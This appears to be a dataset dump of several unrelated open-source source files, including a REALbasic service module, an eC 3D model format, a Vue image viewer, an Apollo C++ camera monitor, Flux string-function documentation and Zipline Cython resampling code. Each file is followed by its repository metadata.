EndConstant #tag Constant, Name = kAccessServiceStart, Type = Integer, Dynamic = False, Default = \"&h10", Scope = Protected #tag EndConstant #tag Constant, Name = kAccessServiceStop, Type = Integer, Dynamic = False, Default = \"&h20", Scope = Protected #tag EndConstant #tag Constant, Name = kAccessServiceUserDefinedControl, Type = Integer, Dynamic = False, Default = \"&h100", Scope = Protected #tag EndConstant #tag ViewBehavior #tag ViewProperty Name="Index" Visible=true Group="ID" InitialValue="-2147483648" InheritedFrom="Object" #tag EndViewProperty #tag ViewProperty Name="Left" Visible=true Group="Position" InitialValue="0" InheritedFrom="Object" #tag EndViewProperty #tag ViewProperty Name="Name" Visible=true Group="ID" InheritedFrom="Object" #tag EndViewProperty #tag ViewProperty Name="Super" Visible=true Group="ID" InheritedFrom="Object" #tag EndViewProperty #tag ViewProperty Name="Top" Visible=true Group="Position" InitialValue="0" InheritedFrom="Object" #tag EndViewProperty #tag EndViewBehavior End Module #tag EndModule
REALbasic
5
bskrtich/WFS
Windows Functionality Suite/Console and Service Support/Modules/ServiceManagerWFS.rbbas
[ "MIT" ]
#ifdef ECERE_STATIC public import static "ecere" #else public import "ecere" #endif enum E3DBlockType : uint16 { version = 0x0001, lzma = 0x0010, meshes = 0x1000, mesh = 0x1010, meshID = 0x1020, meshBBox = 0x1021, attributes = 0x2000, attrVertices = 0x2010, // float x,y,z vertices attrVerticesDbl = 0x2011, // double x,y,z vertices attrQVertices = 0x2018, // quantized x,y,z 16-bit vertices (first, deltas) attrNormals = 0x2020, // 10_10_10_2 attrTexCoords = 0x2030, // float u,v attrTexCoords2 = 0x2031, // float u,v (2nd) attrTexCoords3 = 0x2032, // float u,v (3rd) attrTexCoords4 = 0x2033, // float u,v (4th) attrTexCoords5 = 0x2034, // float u,v (5th) attrTexCoords6 = 0x2035, // float u,v (6th) attrTexCoords7 = 0x2036, // float u,v (7th) attrTexCoords8 = 0x2037, // float u,v (8th) attrColors = 0x2070, // byte r,g,b,a attrTangentsSign = 0x2080, // 10_10_10_2 -- first extra bit: sign for co-tangent attrTangentsBT = 0x2081, // 2x 10_10_10_2 attrSkin = 0x2090, // skin bones and weights attrInterleaved = 0x2800, // currently supporting: [vertices, normals, texCoords] triFaces16 = 0x1030, triFaces32 = 0x1031, facesMaterials = 0x1040, bones = 0x1050, parts = 0x1060, nodes = 0x3000, meshNode = 0x3010, nodeID = 0x3020, nodeName = 0x3021, scaling = 0x3030, orientation = 0x3031, position = 0x3032, // Can have sub-nodes! cameraNode = 0x3011, lightNode = 0x3012, materials = 0x8000, material = 0x8010, materialID = 0x8011, materialName = 0x8012, materialGroup = 0x8013, // Value of 0: not computed... materialFlags = 0x8020, // Flags opacity = 0x8021, // float refractionRelIndex = 0x8022, // refraction index of material / RI of containing medium reflectivity = 0x8023, // float phongShininess = 0x8024, // float // Colors diffuse = 0x8030, specular = 0x8031, emissive = 0x8032, ambient = 0x8034, // default to diffuse if not set? // Maps // use textureID or textureName for the maps: // use attrTexCoords2..attrTexCoords8 to use different texCoords emissiveMap = 0x8100, normalMap = 0x8101, heightmap = 0x8102, // float for parallax mapping ambientOcclusionMap = 0x8103, // float //normalMapXY = 0x8110, // 1-sqrt() -- 2 color option phongDiffuseMap = 0x8200, // include opacity phongSpecularMap = 0x8201, phongAmbientMap = 0x8202, // PBR Roughness Metal pbrRMAlbedo = 0x8300, // include opacity pbrRMRoughnessMetalness = 0x8301, // 8 bit each (16 bits) // pbrRMRoughnessMetalnessAO = 0x8310, // 8 bit each (24 bits) // pbrRMNormalXYRMMap = 0x8311, 10_10_10_2 // PBR Specular pbrSpecDiffuseMap = 0x8400, // include opacity pbrSpecSpecularGlossMap = 0x8401, // Color + 8 bit textures = 0x9000, texture = 0x9001, textureID = 0x9002, textureName = 0x9003, texturePNG = 0x9101, textureJPG = 0x9102, textureJPG2K = 0x9103, animations = 0xA000 }; struct E3DBlockHeader { E3DBlockType type __attribute__((packed)); uint32 size __attribute__((packed)); }; class E3DMaterialFlags : uint32 { public: bool doubleSided:1; bool partlyTransparent:1; bool translucent:1; bool wrapU:1; bool wrapV:1; }; void vecfUnpack10i(uint32 sum, Vector3Df dst, Vector3Df v2) { int part = ( sum >> 0 ) & 1023; dst.x = ( part & 512 ) ? (float)( 1024 - part ) * (-1.0f/512.0f) : (float)part * (1.0f/511.0f); part = ( sum >> 10 ) & 1023; dst.y = ( part & 512 ) ? (float)( 1024 - part ) * (-1.0f/512.0f) : (float)part * (1.0f/511.0f); part = ( sum >> 20 ) & 1023; dst.z = ( part & 512 ) ? (float)( 1024 - part ) * (-1.0f/512.0f) : (float)part * (1.0f/511.0f); if(v2 != null) { part = ( sum >> 30 ) & 3; // TODO: Compute this properly v2.z = ( part & 2 ) ? (float)( 4 - part ) * (-1.0f/2.0f) : (float)part; } } uint32 vecfPack10i(Vector3Df src, Vector3Df v2) { uint32 sum = 0; int part; float v = Min( 1.0f, Max( -1.0f, src.x ) ); part = v > 0.0f ? (int)( ( v * 511.0f ) + 0.5f ) : (int)( ( v * 512.0f ) - 0.5f ); sum |= ( (uint32_t)part & 1023 ) << 0; v = Min( 1.0f, Max( -1.0f, src.y ) ); part = v > 0.0f ? (int)( ( v * 511.0f ) + 0.5f ) : (int)( ( v * 512.0f ) - 0.5f ); sum |= ( (uint32_t)part & 1023 ) << 10; v = Min( 1.0f, Max( -1.0f, src.z ) ); part = v > 0.0f ? (int)( ( v * 511.0f ) + 0.5f ) : (int)( ( v * 512.0f ) - 0.5f ); sum |= ( (uint32_t)part & 1023 ) << 20; if(v2 != null) { v = Min( 1.0f, Max( -1.0f, v2.x ) ); // TODO: Compute this properly part = v > 0.0f ? (int)( ( v * 1.0f ) + 0.5f ) : (int)( ( v * 2.0f ) - 0.5f ); sum |= ( (uint32_t)part & 3 ) << 30; } return sum; }
eC
4
N-eil/ecere-sdk
ecere/src/gfx/3D/models/e3d/e3dDefs.ec
[ "BSD-3-Clause" ]
package scala.tools.eclipse.contribution.weaving.jdt.ui.javaeditor; import org.eclipse.jdt.core.IJavaElement; import org.eclipse.jdt.core.IPackageFragmentRoot; import org.eclipse.jdt.internal.corext.util.JavaModelUtil; import org.eclipse.jdt.internal.ui.viewsupport.JavaElementLabelComposer; import org.eclipse.jdt.ui.JavaElementLabels; import scala.tools.eclipse.contribution.weaving.jdt.IScalaElement; /** Tweaks the labels in the outline, to display Scala native syntax * */ @SuppressWarnings("restriction") public privileged aspect OutlineAspect { pointcut appendElementLabel(JavaElementLabelComposer jelc, IJavaElement element, long flags) : execution(void JavaElementLabelComposer.appendElementLabel(IJavaElement, long)) && args(element, flags) && target(jelc); void around(JavaElementLabelComposer jelc, IJavaElement element, long flags) : appendElementLabel(jelc, element, flags) { if (!(element instanceof IScalaElement)) proceed(jelc, element, flags); else { IPackageFragmentRoot root = JavaModelUtil.getPackageFragmentRoot(element); if (JavaElementLabelComposer.getFlag(flags, JavaElementLabels.PREPEND_ROOT_PATH)) { jelc.appendPackageFragmentRootLabel(root, JavaElementLabels.ROOT_QUALIFIED); jelc.fBuffer.append(JavaElementLabels.CONCAT_STRING); } IScalaElement scalaElement = (IScalaElement)element; jelc.fBuffer.append(scalaElement.getLabelText(flags)); if (JavaElementLabelComposer.getFlag(flags, JavaElementLabels.APPEND_ROOT_PATH)) { int offset= jelc.fBuffer.length(); jelc.fBuffer.append(JavaElementLabels.CONCAT_STRING); jelc.appendPackageFragmentRootLabel(root, JavaElementLabels.ROOT_QUALIFIED); if (JavaElementLabelComposer.getFlag(flags, JavaElementLabels.COLORIZE)) { jelc.fBuffer.setStyle(offset, jelc.fBuffer.length() - offset, JavaElementLabelComposer.QUALIFIER_STYLE); } } } } }
AspectJ
4
dragos/scala-ide
org.scala-ide.sdt.aspects/src/scala/tools/eclipse/contribution/weaving/jdt/ui/javaeditor/OutlineAspect.aj
[ "BSD-3-Clause" ]
<template> <v-uni-movable-area class="image-view-area" @touchstart.native="onTouchStart" @touchmove.native="checkDirection" @touchend.native="onTouchEnd" > <v-uni-movable-view class="image-view-view" :direction="direction" inertia scale scale-min="1" scale-max="4" @scale="onScale" > <img :src="src" class="image-view-img" @load="onImgLoad" > </v-uni-movable-view> </v-uni-movable-area> </template> <script> export default { name: 'ImageView', props: { src: { type: String, default: '' } }, data () { return { direction: 'none' } }, created () { this.scale = 1 this.imgWidth = 0 this.imgHeight = 0 this.width = 0 this.height = 0 }, methods: { onScale ({ detail: { scale } }) { this.scale = scale }, onImgLoad (event) { const target = event.target const rect = target.getBoundingClientRect() this.imgWidth = rect.width this.imgHeight = rect.height }, onTouchStart (event) { const $el = this.$el const rect = $el.getBoundingClientRect() this.width = rect.width this.height = rect.height this.checkDirection(event) }, onTouchEnd (event) { const scale = this.scale const horizontal = scale * this.imgWidth > this.width const vertical = scale * this.imgHeight > this.height if (horizontal && vertical) { this.direction = 'all' } else if (horizontal) { this.direction = 'horizontal' } else if (vertical) { this.direction = 'vertical' } else { this.direction = 'none' } this.checkDirection(event) }, checkDirection (event) { // 避免水平滑动和 swiper 冲突 const direction = this.direction if (direction === 'all' || direction === 'horizontal') { event.stopPropagation() } } } } </script> <style> .image-view-area, .image-view-view { position: absolute; left: 0; top: 0; width: 100%; height: 100%; } .image-view-img { position: absolute; left: 50%; top: 50%; transform: translate(-50%, -50%); max-height: 100%; max-width: 100%; } </style>
Vue
5
13937836398/uni-app
src/platforms/h5/components/system-routes/preview-image/image-view.vue
[ "Apache-2.0" ]
--- title: Forgot password layout: single menu: base.authentication.auth-lock --- {% include cards/auth-lock.html show-header="1" %}
HTML
2
muhginanjar/tabler
src/pages/auth-lock.html
[ "MIT" ]
# This test is included from within tunittests import unittest test "loop variables are captured by ref": var funcs: seq[proc (): int {.closure.}] = @[] for i in 0..10: let ii = i funcs.add do -> int: return ii * ii check funcs[0]() == 100 check funcs[3]() == 100 test "loop variables in closureScope are captured by copy": var funcs: seq[proc (): int {.closure.}] = @[] for i in 0..10: closureScope: let ii = i funcs.add do -> int: return ii * ii check funcs[0]() == 0 check funcs[3]() == 9
Nimrod
4
alehander92/Nim
tests/closure/uclosures.nim
[ "MIT" ]
/****************************************************************************** * Copyright 2020 The Apollo Authors. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. *****************************************************************************/ #include "modules/monitor/software/camera_monitor.h" #include <memory> #include <set> #include <string> #include <utility> #include "absl/strings/str_cat.h" #include "modules/drivers/proto/sensor_image.pb.h" #include "cyber/common/log.h" #include "cyber/cyber.h" #include "modules/common/adapters/adapter_gflags.h" #include "modules/common/util/map_util.h" #include "modules/monitor/common/monitor_manager.h" #include "modules/monitor/software/summary_monitor.h" DEFINE_string(camera_monitor_name, "CameraMonitor", "Name of the camera monitor."); DEFINE_double(camera_monitor_interval, 5, "Camera monitor checking interval in seconds."); DEFINE_string(camera_component_name, "Camera", "Camera component name."); namespace apollo { namespace monitor { namespace { using ReaderAndMessagePair = std::pair<std::shared_ptr<cyber::ReaderBase>, std::shared_ptr<drivers::Image>>; ReaderAndMessagePair CreateReaderAndLatestsMessage(const std::string& camera) { const auto reader = MonitorManager::Instance()->CreateReader<drivers::Image>(camera); reader->Observe(); const auto message = reader->GetLatestObserved(); reader->ClearData(); return {reader, message}; } static const auto camera_topic_set = std::set<std::string>{ FLAGS_image_long_topic, FLAGS_camera_image_long_topic, FLAGS_camera_image_short_topic, FLAGS_camera_front_6mm_topic, FLAGS_camera_front_6mm_2_topic, FLAGS_camera_front_12mm_topic, // Add more cameras here if you want to monitor. }; } // namespace CameraMonitor::CameraMonitor() : RecurrentRunner(FLAGS_camera_monitor_name, FLAGS_camera_monitor_interval) {} void CameraMonitor::RunOnce(const double current_time) { auto* manager = MonitorManager::Instance(); auto* component = apollo::common::util::FindOrNull( *manager->GetStatus()->mutable_components(), FLAGS_camera_component_name); if (component == nullptr) { // camera is not monitored in current mode, skip. return; } auto* status = component->mutable_other_status(); UpdateStatus(status); } void CameraMonitor::UpdateStatus(ComponentStatus* status) { status->clear_status(); std::string frame_id = ""; for (const auto& topic : camera_topic_set) { const auto& reader_message_pair = CreateReaderAndLatestsMessage(topic); const auto& reader = reader_message_pair.first; const auto& message = reader_message_pair.second; if (reader != nullptr && message != nullptr) { if (frame_id.empty()) { const auto& header = message->header(); if (header.has_frame_id()) { frame_id = header.frame_id(); } } else { SummaryMonitor::EscalateStatus( ComponentStatus::ERROR, absl::StrCat("Only one camera is permitted"), status); } } } if (frame_id.empty()) { SummaryMonitor::EscalateStatus( ComponentStatus::ERROR, absl::StrCat("No camera is detected"), status); } else { SummaryMonitor::EscalateStatus( ComponentStatus::OK, absl::StrCat("Detected one camera: ", frame_id), status); } } } // namespace monitor } // namespace apollo
C++
4
jzjonah/apollo
modules/monitor/software/camera_monitor.cc
[ "Apache-2.0" ]
// Package strings provides functions to manipulate UTF-8 encoded strings. package strings // title converts a string to title case. // // ## Parameters // // - `v` is the string value to convert. // // ## Convert all values of a column to title case // // ``` // import "strings" // // data // |> map(fn: (r) => ({ r with pageTitle: strings.title(v: r.pageTitle) })) // builtin title : (v: string) => string // toUpper converts a string to uppercase. // // ## Parameters // // - `v` is the string value to convert. // // ## Convert all values of a column to upper case // // ``` // import "strings" // // data // |> map(fn: (r) => ({ r with envVars: strings.toUpper(v: r.envVars) })) // ``` // // The difference between toTitle and toUpper // // - The results of toUpper() and toTitle are often the same, however the difference is visible when using special characters: // // - str = "dz" // // - strings.toUpper(v: str) // Returns DZ // - strings.toTitle(v: str) // Returns Dz // builtin toUpper : (v: string) => string // toLower converts a string to lowercase. // // ## Parameters // // - `v` is the string value to convert. // // ## Convert all values of a column to lower case // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with exclamation: strings.toLower(v: r.exclamation) // }) // ) // ``` // builtin toLower : (v: string) => string // trim removes leading and trailing characters specified in the cutset from a string. // // ## Parameters // // - `v` is the string to remove characters from. // - `cutset` is the leading and trailing characters to remove from the string. // // Only characters that match the cutset string exactly are trimmed. // // ## Trim leading and trailing periods from all values in a column // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // variables: strings.trim(v: r.variables, cutset: ".") // }) // ) // builtin trim : (v: string, cutset: string) => string // trimPrefix removes a prefix from a string. Strings that do not start with the prefix are returned unchanged. // // ## Parameters // // - `v` is the string to trim // - `prefix` is the prefix to remove // // ## Trim leading and trailing periods from all values in a column // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // sensorID: strings.trimPrefix(v: r.sensorId, prefix: "s12_") // }) // ) // ``` // builtin trimPrefix : (v: string, prefix: string) => string // trimSpace removes leading and trailing spaces from a string. // // ## Parameters // // - `v` is the string to remove spaces from // // ## Trim leading and trailing spaces from all values in a column // // ``` // import "strings" // // data // |> map(fn: (r) => ({ r with userInput: strings.trimSpace(v: r.userInput) })) // ``` builtin trimSpace : (v: string) => string // The trimSuffix removes a suffix from a string. Strings that do not end with the suffix are returned unchanged. // // ## Parameters // // - `v` is the string to trim // - `suffix` is the suffix to remove. // // ## Remove a suffix from all values in a column // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // sensorID: strings.trimSuffix(v: r.sensorId, suffix: "_s12") // }) // ) // ``` // builtin trimSuffix : (v: string, suffix: string) => string // trimRight removes trailing characters specified in the cutset from a string. // // ## Parameters // // - `v` is the string to to remove characters from // - `cutset` is the trailing characters to trim from the string. // // Only characters that match the cutset string exactly are trimmed. // // ## Trim trailing periods from all values in a column // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // variables: strings.trimRight(v: r.variables, cutset: ".") // }) // ) // ``` // builtin trimRight : (v: string, cutset: string) => string // trimLeft removes specified leading characters from a string. // // ## Parameters // // - `v` is the string to to remove characters from // - `cutset` is the trailing characters to trim from the string. // // ## Trim leading periods from all values in a column // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // variables: strings.trimLeft(v: r.variables, cutset: ".") // }) // ) // ``` // builtin trimLeft : (v: string, cutset: string) => string // toTitle converts all characters in a string to title case. // // ## Parameters // // - `v` is the string value to convert. // // ## Convert characters in a string to title case // // ``` // import "strings" // // data // |> map(fn: (r) => ({ r with pageTitle: strings.toTitle(v: r.pageTitle) })) // ``` // builtin toTitle : (v: string) => string // hasPrefix indicates if a string begins with a specified prefix. // // ## Parameters // // - `v` is the string value to search. // - `prefix` is the string prefix to search for. // // ## Filter based on the presence of a prefix in a column value // // ``` // import "strings" // // data // |> filter(fn:(r) => strings.hasPrefix(v: r.metric, prefix: "int_" )) // ``` // builtin hasPrefix : (v: string, prefix: string) => bool // hasSuffix indicates if a string ends with a specified suffix. // // ## Parameters // // - `v` is the string value to search. // - `prefix` is the string suffix to search for. // // ## Filter based on the presence of a suffix in a column value // // ``` // import "strings" // // data // |> filter(fn:(r) => strings.hasSuffix(v: r.metric, suffix: "_count" )) // ``` // builtin hasSuffix : (v: string, suffix: string) => bool // containsStr reports whether a string contains a specified substring. // // ## Parameters // // - `v` is the string value to search // - `substr` is the substring value to search for // // ## Report if a string contains a specific substring // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // _value: strings.containsStr(v: r.author, substr: "John") // }) // ) // ``` // builtin containsStr : (v: string, substr: string) => bool // containsAny reports whether a specified string contains characters from another string. // // ## Parameters // // - `v` is the string value to search // - `chars` is the character to search for // // ## Report if a string contains specific characters // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // _value: strings.containsAny(v: r.price, chars: "£$¢") // }) // ) // ``` // builtin containsAny : (v: string, chars: string) => bool // equalFold reports whether two UTF-8 strings are equal under Unicode case-folding. // // ## Parameters // // - `v` is the string value to compare // - `t` is the string value to compare against // // ## Ignore case when testing if two strings are the same // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // string1: r.string1, // string2: r.string2, // same: strings.equalFold(v: r.string1, t: r.string2) // }) // ) // ``` // builtin equalFold : (v: string, t: string) => bool // compare compares the lexicographical order of two strings. // // Return values // Comparison Return value // v < t -1 // v == t 0 // v > t 1 // // ## Parameters // // - `v` is the string value to compare // - `t` is the string value to compare against // // ## Compare the lexicographical order of column values // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // _value: strings.compare(v: r.tag1, t: r.tag2) // }) // ) // ``` // builtin compare : (v: string, t: string) => int //countStr counts the number of non-overlapping instances of a substring appears in a string. // // ## Parameters // // - `v` is the string value to search // - `substr` is the substr value to count // // The function counts only non-overlapping instances of substr. For example: // strings.coutnStr(v: "ooooo", substr: "oo") // // Returns 2 -- (oo)(oo)o // // ## Count instances of a substring within a string // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // _value: strings.countStr(v: r.message, substr: "uh") // }) // ) // ``` // builtin countStr : (v: string, substr: string) => int // index returns the index of the first instance of a substring in a string. If the substring is not present, it returns -1. // // ## Parameters // // - `v` is the string value to search // - `substr` is the substring to search for // // ## Find the first occurrence of a substring // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // the_index: strings.index(v: r.pageTitle, substr: "the") // }) // ) // ``` // builtin index : (v: string, substr: string) => int // indexAny returns the index of the first instance of specified characters in a string. If none of the specified characters are present, it returns -1. // // ## Parameters // // - `v` is the string value to search // - `chars` are the chars to search for // // ## Find the first occurrence of characters from a string // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // charIndex: strings.indexAny(v: r._field, chars: "_-") // }) // ) // ``` // builtin indexAny : (v: string, chars: string) => int // lastIndex returns the index of the last instance of a substring in a string. If the substring is not present, the function returns -1. // // ## Parameters // // - `v` is the string value to search // - `substr` is the substring to search for // // ## Find the last occurrence of a substring // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // the_index: strings.lastIndex(v: r.pageTitle, substr: "the") // }) // ) // ``` // builtin lastIndex : (v: string, substr: string) => int // lastIndexAny returns the index of the last instance of any specified characters in a string. If none of the specified characters are present, the function returns -1. // // ## Parameters // // - `v` is the string value to search // - `chars` are the characters to search for // // ## Find the last occurrence of characters from a string // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // charLastIndex: strings.lastIndexAny(v: r._field, chars: "_-") // }) // ) // ``` // builtin lastIndexAny : (v: string, chars: string) => int // isDigit tests if a single-character string is a digit (0-9). // // ## Parameters // // - `v` is the single-character string to test. // // ## Filter by columns with digits as values // // ``` // import "strings" // // data // |> filter(fn: (r) => strings.isDigit(v: r.serverRef)) // ``` // builtin isDigit : (v: string) => bool // isLetter tests if a single character string is a letter (a-z, A-Z). // // ## Parameters // // - `v` is the single-character string to test. // // ## Filter by columns with digits as values // // ``` // import "strings" // // data // |> filter(fn: (r) => strings.isLetter(v: r.serverRef)) // ``` // builtin isLetter : (v: string) => bool // isLower tests if a single-character string is lowercase. // // ## Parameters // // - `v` is the single-character string value to test. // // ## Filter by columns with single-letter lowercase values // // ``` // import "strings" // // data // |> filter(fn: (r) => strings.isLower(v: r.host)) // ``` // builtin isLower : (v: string) => bool // isUpper tests if a single character string is uppercase. // // ## Parameters // // - `v` is the single-character string value to test. // // ## Filter by columns with single-letter uppercase values // // ``` // import "strings" // // data // |> filter(fn: (r) => strings.isUpper(v: r.host)) // ``` // builtin isUpper : (v: string) => bool // repeat returns a string consisting of i copies of a specified string. // // ## Parameters // // - `v` is the string value to repeat. // - `i` is the number of times to repeat v. // // ## Repeat a string based on existing columns // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // laugh: r.laugh // intensity: r.intensity // laughter: strings.repeat(v: r.laugh, i: r.intensity) // }) // ) // ``` // builtin repeat : (v: string, i: int) => string // replace replaces the first i non-overlapping instances of a substring with a specified replacement. // // ## Parameters // // - `v` is the string value to search. // - `t` is the substring value to replace. // - `u` is the replacement for i instances of t. // - `i` is the number of non-overlapping t matches to replace. // // ## Replace a specific number of string matches // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // content: strings.replace(v: r.content, t: "he", u: "her", i: 3) // }) // ) // ``` // builtin replace : (v: string, t: string, u: string, i: int) => string // replaceAll replaces all non-overlapping instances of a substring with a specified replacement. // // ## Parameters // // - `v` is the string value to search. // - `t` is the substring to replace. // - `u` is the replacement for all instances of t. // // ## Replace string matches // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // content: strings.replaceAll(v: r.content, t: "he", u: "her") // }) // ) // ``` // builtin replaceAll : (v: string, t: string, u: string) => string // split splits a string on a specified separator and returns an array of substrings. // // ## Parameters // // - `v` is the string value to split. // - `t` is the string value that acts as the separator. // // ## Split a string into an array of substrings // // ``` // import "strings" // // data // |> map (fn:(r) => strings.split(v: r.searchTags, t: ",")) // ``` // builtin split : (v: string, t: string) => [string] // splitAfter splits a string after a specified separator and returns an array of substrings. Split substrings include the separator, t. // // ## Parameters // // - `v` is the string value to split. // - `t` is the string value that acts as the separator. // // ## Split a string into an array of substrings // // ``` // import "strings" // // data // |> map (fn:(r) => strings.splitAfter(v: r.searchTags, t: ",")) // ``` // builtin splitAfter : (v: string, t: string) => [string] // splitN splits a string on a specified separator and returns an array of i substrings. // // ## Parameters // // - `v` is the string value to split. // - `t` is the string value that acts as the separator. // - `i` is the maximum number of split substrings to return. -1 returns all matching substrings. // // - The last substring is the unsplit remainder. // // ## Split a string into an array of substrings // // ``` // import "strings" // // data // |> map (fn:(r) => strings.splitN(v: r.searchTags, t: ",")) // ``` // builtin splitN : (v: string, t: string, n: int) => [string] // splitAfterN splits a string after a specified separator and returns an array of i substrings. Split substrings include the separator t. // // ## Parameters // // - `v` is the string value to split. // - `t` is the string value that acts as the separator. // - `i` is the maximum number of split substrings to return. -1 returns all matching substrings. // // - The last substring is the unsplit remainder. // // ## Split a string into an array of substrings // // ``` // import "strings" // // data // |> map (fn:(r) => strings.splitAfterN(v: r.searchTags, t: ",")) // ``` // builtin splitAfterN : (v: string, t: string, i: int) => [string] // joinStr concatenates elements of a string array into a single string using a specified separator. // // ## Parameters // // - `arr` is the array of strings to concatenate. // - `t` is the separator to use in the concatenated value. // // ## Join a list of strings into a single string // // ``` // import "strings" // // searchTags = ["tag1", "tag2", "tag3"] // // strings.joinStr(arr: searchTags, v: ",")) // ``` // builtin joinStr : (arr: [string], v: string) => string // strlen returns the length of a string. String length is determined by the number of UTF code points a string contains. // // ## Parameters // // - `v` is the string value to measure. // // ## Filter based on string value length // // ``` // import "strings" // // data // |> filter(fn: (r) => strings.strlen(v: r._measurement) <= 4) // ``` // // ## Store the length of string values // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // length: strings.strlen(v: r._value) // }) // ) // ``` // builtin strlen : (v: string) => int // substring returns a substring based on start and end parameters. These parameters are represent indices of UTF code points in the string. // // ## Parameters // // - `v` is the string value to search for. // - `start` is the starting inclusive index of the substring. // - `end` is the ending exclusive index of the substring. // // ## Store the first four characters of a string // // ``` // import "strings" // // data // |> map(fn: (r) => ({ // r with // abbr: strings.substring(v: r.name, start: 0, end: 4) // }) // ) // ``` builtin substring : (v: string, start: int, end: int) => string
FLUX
5
NReilingh/flux
stdlib/strings/strings.flux
[ "MIT" ]
# Copyright 2016 Quantopian, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from cython cimport boundscheck, wraparound from numpy import finfo, float64, nan, isnan from numpy cimport intp_t, float64_t, uint32_t @boundscheck(False) @wraparound(False) cpdef void _minute_to_session_open(intp_t[:] close_locs, float64_t[:] data, float64_t[:] out): cdef intp_t i, close_loc, loc = 0 cdef float64_t val for i, close_loc in enumerate(close_locs): val = nan # Start by getting the price value at the opening minute of each day. # If the value is NaN, continue looking forward until we either find a # valid value or reach the closing minute, at which point the value is # just kept as a NaN. We increment 'loc' after obtaining the value to # ensure we do not reach an out of bounds index. while isnan(val) and loc <= close_loc: val = data[loc] loc += 1 out[i] = val loc = close_loc + 1 @boundscheck(False) @wraparound(False) cpdef void _minute_to_session_high(intp_t[:] close_locs, float64_t[:] data, float64_t[:] out): cdef intp_t i, close_loc, loc = 0 cdef float64_t val for i, close_loc in enumerate(close_locs): val = -1 while loc <= close_loc: val = max(val, data[loc]) loc += 1 if val == -1: val = nan out[i] = val loc = close_loc + 1 @boundscheck(False) @wraparound(False) cpdef void _minute_to_session_low(intp_t[:] close_locs, float64_t[:] data, float64_t[:] out): cdef intp_t i, close_loc, loc = 0 cdef float64_t val cdef float64_t max_float = finfo(float64).max for i, close_loc in enumerate(close_locs): val = max_float while loc <= close_loc: val = min(val, data[loc]) loc += 1 if val == max_float: val = nan out[i] = val loc = close_loc + 1 @boundscheck(False) @wraparound(False) cpdef void _minute_to_session_close(intp_t[:] close_locs, float64_t[:] data, float64_t[:] out): cdef intp_t i, prev_close_loc, loc = 0 cdef float64_t val num_out = len(out) for i in range(num_out - 1, -1, -1): if i > 0: prev_close_loc = close_locs[i - 1] else: prev_close_loc = -1 loc = close_locs[i] val = nan # Start by getting the price value at the closing minute of each day. # If the value is NaN, continue looking back until we either find a # valid value or reach the closing minute of the previous day, at which # point the value is just kept as a NaN. We decrement 'loc' after # obtaining the value to ensure we do not reach a negative index. while isnan(val) and loc > prev_close_loc: val = data[loc] loc -= 1 out[i] = val @boundscheck(False) @wraparound(False) cpdef void _minute_to_session_volume(intp_t[:] close_locs, uint32_t[:] data, uint32_t[:] out): cdef intp_t i, close_loc, loc = 0 cdef uint32_t val loc = 0 for i, close_loc in enumerate(close_locs): val = 0 while loc <= close_loc: val += data[loc] loc += 1 out[i] = val loc = close_loc + 1
Cython
5
leonarduschen/zipline
zipline/data/_resample.pyx
[ "Apache-2.0" ]
